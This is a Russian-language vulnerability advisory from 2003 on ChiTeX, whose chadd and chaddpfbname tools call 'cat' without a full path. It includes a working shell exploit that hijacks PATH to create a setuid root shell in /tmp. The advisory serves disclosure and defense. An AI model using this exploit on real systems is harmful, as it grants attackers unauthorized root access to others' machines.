Недостаток в определении пути позволяет локальному пользователю получить root привилегии в ChiTeX

Дата публикации:
08.04.2003
Всего просмотров:
672
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Уязвимость обнаружена в ChiTeX. Локальный пользователь может получить root привилегии на системе.

программное обеспечение выполняет системный запрос, ссылающийся на команду 'cat', не используя явный путь к cat утилите. В результате, локальный пользователь может создать программу с именем 'cat', которая будет расположена в каталоге в системном пути и затем вызвать ChiTeX, который выполнить код пользователя с root привилегиями. Уязвимые программы - chadd и chaddpfbname. Пример:

#!/bin/sh
echo 'owned' > 'psfontsmap@'
export psfontsmap=3D/tmp/owned
echo "/bin/cp /bin/sh /tmp/.sh" > /tmp/cat
echo "/bin/chmod 4755 /tmp/.sh" >>  /tmp/cat
chmod +x /tmp/cat
cd /tmp
export PATH=3D"/tmp:$PATH"
/usr/local/bin/chaddpfbname
/tmp/.sh -c id
/tmp/.sh
Уязвимость обнаружена в ChiTex 6.1.2p7.8-1

Ссылки: ChiTeX local root vulnerability
или введите имя

CAPTCHA